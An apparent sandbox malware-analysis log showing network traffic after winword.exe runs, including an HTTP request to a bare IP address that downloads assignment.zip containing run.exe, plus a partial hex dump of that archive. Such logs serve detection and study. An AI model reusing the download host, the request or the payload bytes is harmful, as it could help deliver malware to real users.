      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: winword.exeMemory has grown: Private usage: 1MB later: 64MB
      Source: global trafficHTTP traffic detected: GET /d/assignment.zip HTTP/1.1Host: 91.208.206.195Connection: Keep-Alive
      Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.195
      Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.195
      Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.195
      Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.195
      Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.195
      Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.195
      Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.195
      Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.195
      Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.195
      Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.195
      Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.195
      Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.195
      Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.195
      Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.195
      Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.195
      Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.195
      Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.195
      Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.195
      Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.195
      Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.195
      Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.195
      Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.195
      Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.195
      Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.195
      Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.195
      Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.195
      Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.195
      Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.195
      Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.195
      Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.195
      Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.195
      Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.195
      Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.195
      Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.195
      Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.195
      Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.195
      Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.195
      Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.195
      Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.195
      Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.195
      Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.195
      Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.195
      Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.195
      Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.195
      Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.195
      Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.195
      Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.195
      Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.195
      Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.195
      Source: unknownTCP traffic detected without corresponding DNS query: 91.208.206.195
      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 20 Dec 2024 23:13:13 GMTServer: Apache/2.4.62 (Debian)Content-Length: 2490070Last-Modified: Tue, 03 Dec 2024 21:48:59 GMTContent-Disposition: attachment; filename=assignment.zipCache-Control: no-cacheETag: "1733262539.037506-2490070-3848998161"Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/zipData Raw: 50 4b 03 04 0a 00 00 00 00 00 e5 85 83 59 4c 44 2a a8 1e fe 25 00 1e fe 25 00 11 00 1c 00 61 73 73 69 67 6e 6d 65 6e 74 28 32 29 2e 7a 69 70 55 54 09 00 03 5d 7c 4f 67 5c 7c 4f 67 75 78 0b 00 01 04 e8 03 00 00 04 e8 03 00 00 50 4b 03 04 14 00 00 00 08 00 a6 85 83 59 8a 6e c0 27 7a fd 25 00 6b a9 5d 00 07 00 1c 00 72 75 6e 2e 65 78 65 55 54 09 00 03 e8 7b 4f 67 21 7c 4f 67 75 78 0b 00 01 04 e8 03 00 00 04 e8 03 00 00 e4 5a 7b 7c 14 45 b6 ae 99 3c 1c 94 d0 c3 4b a2 f2 18 35 e2 e0 23 93 71 57 4d 50 71 46 42 a8 59 9b 10 25 3c 56 42 08 22 31 f8 80 6c 98 40 54 ae 77 62 66 30 7d db 61 83 02 a2 40 44 84 fd c1 8a 0a 5e d4 80 22 19 02 0c b8 2a 31 cb 2e 0f ef f5 46 7c 75 08 ae c4 bd 62 82 b2 b3 e7 54 75 4f 77 4f 12 58 ef bf 37 3f a5 bb aa be 3a f5 d5 a9 73 4e 9d aa 9e 09 f7 d5 91 24 42 48 32 fc 1f 8b 11 d2 40 f8 9f 87 5c f8 2f 00 ff f7 1b b1 b3 1f d9 de e7 a3 2b 1b 2c e2 47 57 16 96 cd 5d e0 28 af 98 ff 60 c5 ac 47 1d b3 67 cd 9b 37 df ef b8 7f 8e a3 a2 72 9e 63 ee 3c 47 ee c4 49 8e 47 e7 3f 30 27 33 2d ed e2 0c 55 46 c1 38 42 1e 58 72 31 51 9e 98 f8 20 59 9f 47 6e 13 09 39 4d 46 5a 2f b1 5a af 27 cd 6e 42 ea f3 18 b9 d3 03 01 6c e7 d4 2c 44 7d b7 72 de f8 97 82 05 56 3f 9e 55 4e 7d b2 18 e6 55 02 50 87 5a af b1 b6 27 94 4d af 84 94 e7 91 8c 2b 0d e5 56 2f 59 35 c3 a2 97 1b f3 88 d3 7b 1e 9d d8 ee 24 ce 1e ea 4f 2f ca 23 47 53 7b ef 97 e9 9f 53 e5 87 a7 f3 90 9b 13 c2 b9 27 9b 31 25 f0 5f e6 03 b3 fc b3 b0 19 65 b5 02 c6 06 cf c3 6e 13 ce 03 2c 33 2b 38 b0 a4 55 80 c1 a1 fd 04 3c ff ab 1b ce 93 59 ce 71 6c 8e 30 57 52 0c cf f7 bd dd 71 55 1c 57 38 0c ac c5 33 96 90 e1 f0 1c 3a b6 3b ee 